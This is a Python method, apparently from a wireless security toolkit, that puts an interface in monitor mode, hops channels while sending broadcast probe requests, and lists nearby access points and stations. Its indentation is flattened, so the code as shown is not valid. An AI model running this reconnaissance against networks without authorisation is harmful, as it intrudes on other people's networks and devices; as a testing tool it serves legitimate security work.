def run(self):
self.receiver = self.getReceiver(interface=self.args["INTERFACE"])
self.emitter = self.getEmitter(interface=self.args["INTERFACE"])
if self.checkCapabilities():
self.receiver.onEvent("*",callback=self.scan)
accessPoints = {}
channel = 0
for i in range(utils.integerArg(self.args['TIME'])):
self.receiver.setChannel(channel+1)
self.emitter.sendp(wifi.WifiProbeRequest(srcMac = 'FF:FF:FF:FF:FF:FF', destMac= 'FF:FF:FF:FF:FF:FF', emitMac = "FF:FF:FF:FF:FF:FF"))
channel = (channel+1) % 14
utils.wait(seconds=1)
if utils.booleanArg(self.args["ACCESS_POINTS"]):
self.updateAccessPoints()
if utils.booleanArg(self.args["STATIONS"]):
self.updateStations()
output = self.generateOutput()
return self.ok(output)
else:
io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to scan and run in monitor mode.")
return self.nok()
